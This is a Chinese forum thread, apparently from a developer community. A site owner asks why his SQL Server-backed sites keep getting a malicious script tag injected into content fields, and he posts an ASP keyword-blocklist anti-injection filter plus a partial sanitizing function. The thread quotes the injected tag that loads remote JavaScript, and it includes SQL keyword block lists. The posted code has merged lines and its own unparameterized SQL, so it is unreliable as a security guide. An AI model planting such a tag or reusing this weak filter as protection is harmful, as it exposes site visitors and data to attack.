我有几个网站近来连续被人在sql server数据库里挂马,一般都是在内容、标题等字段中插入<Script Src=http://c.nuclea%723.com/css/c.js></Script>这一类的东西
我删了或恢复了数据库,隔几小时又遭了。
我用HDIS、WED、网站啄木鸟都检测过,都报告找不到注入点(我代码里加了过滤的)
我不知道他是用的什么方法注入进来的
朋友们,帮帮想想招呀
我删了或恢复了数据库,隔几小时又遭了。
我用HDIS、WED、网站啄木鸟都检测过,都报告找不到注入点(我代码里加了过滤的)
我不知道他是用的什么方法注入进来的
朋友们,帮帮想想招呀
这段时间我听说了好几个这样的事了
dbkillSql="/SqlIn.mdb"
'On Error Resume Next
Set killSqlconn = Server.CreateObject("ADODB.Connection")
connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
killSqlconn.Open connkillSql
If Err Then
err.Clear
Set killSqlconn = Nothing
Response.Write "数据库连接出错,请检查连接字串。"
Response.End
End If
'--------定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql
'自定义需要过滤的字串,用 "|" 分隔
Fy_In = "'|;|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|where|create|drop "
Fy_InForm = ";|exec|insert|select|delete|update|count|*|chr|mid|master|truncate|char|declare|where|create|drop "
Kill_IP=True
WriteSql=True
'----------------------------------Fy_Inf_Form = split(Fy_In,"|")
Fy_Inf = split(Fy_In,"|")
'--------POST部份------------------If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf_Form)
str=LCase(Request.Form(Fy_Post))
If Instr(str,Fy_Inf(Fy_Xh))<>0 Then
If WriteSql=True Then
killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
killSqlconn.close
Set killSqlconn = Nothing
End If
Response.Write "<Script Language=JavaScript>alert('请不要在参数中包含非法字符尝试注入!');</Script>"
Response.Write "非法操作!系统做了如下记录↓<br>"
Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.Write "操作时间:"&Now&"<br>"
Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
Response.Write "提交方式:POST<br>"
Response.Write "提交参数:"&Fy_Post&"<br>"
Response.Write "提交数据:"&Request.Form(Fy_Post)
Response.End
End If
Next
Next
End If
'----------------------------------'--------GET部份-------------------
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
If WriteSql=True Then
killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Fy_Get&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")
killSqlconn.close
Set killSqlconn = Nothing
End If
Response.Write "<Script Language=JavaScript>alert('SQL通用防注入系统提示你↓\n\n请不要在参数中包含非法字符尝试注入!\n\nHttp://Www.wrsky.Com 系统版本:V3.0(ASP)版\n\nBy:Neeao');</Script>"
Response.Write "非法操作!系统做了如下记录↓<br>"
Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.Write "操作时间:"&Now&"<br>"
Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
Response.Write "提交方式:GET<br>"
Response.Write "提交参数:"&Fy_Get&"<br>"
Response.Write "提交数据:"&Request.QueryString(Fy_Get)
Response.End
End If
Next
Next
End IfIf Kill_IP=True Then
Dim Sqlin_IP,rsKill_IP,Kill_IPsql
Sqlin_IP=Request.ServerVariables("REMOTE_ADDR")
Kill_IPsql="select Sqlin_IP from SqlIn where Sqlin_IP='"&Sqlin_IP&"' and kill_ip=true"
Set rsKill_IP=killSqlconn.execute(Kill_IPsql)
If Not(rsKill_IP.eof or rsKill_IP.bof) Then
Response.write "<Script Language=JavaScript>alert('你的Ip已经被本系统自动锁定!\n\n如想访问本站请和管理员联系!');</Script>"
Response.End
End If
rsKill_IP.close
End If
我知道还有一种是伪造cookies的注入,我没有过滤这个,但是我的这几个站里都没有用到cookies,都用的是session
'过虑成全角的'
就行了
这是新闻显示页面,一般都是注入到content字段里
按说,我的表名凭人是猜不到的
如果我把<>等过滤了,那正常用户要在里面输入这些字符怎么办呢?我以前的做法是用一个以下的函数
function sqlin(str)if str<>"" then
str=replace(str," "," ")
str=replace(str,"'","’")
str=replace(str,";",";")
str=replace(str,"and","AND")
str=replace(str,"exec","EXEC")
str=replace(str,"insert","INSERT")
str=replace(str,"select","SELECT")
str=replace(str,"delete","DELETE")
str=replace(str,"update","UPDATE")
str=replace(str,"count","COUNT")
str=replace(str,"*","*")
str=replace(str,"%","%")
str=replace(str,"chr","CHR")
str=replace(str,"mid","MID")
str=replace(str,"master","MASTER")
str=replace(str,"truncate","TRUNCATE")
str=replace(str,"char","CHAR")
str=rep
在获取输入之前把里面的字符替换掉
如a=sqlin(request("a"))
同时也用上了我在3楼所发的过滤,但似乎不起作用。后来我想,是不是因为过滤先于这个函数执行,有非法字符都被过滤挡了,所以这个函数就不起作用了。
不知我的理解对不对?请朋友们指教。
这种现象很不像是人所谓,更像是自动工具
15058618 DOTNET爱好者群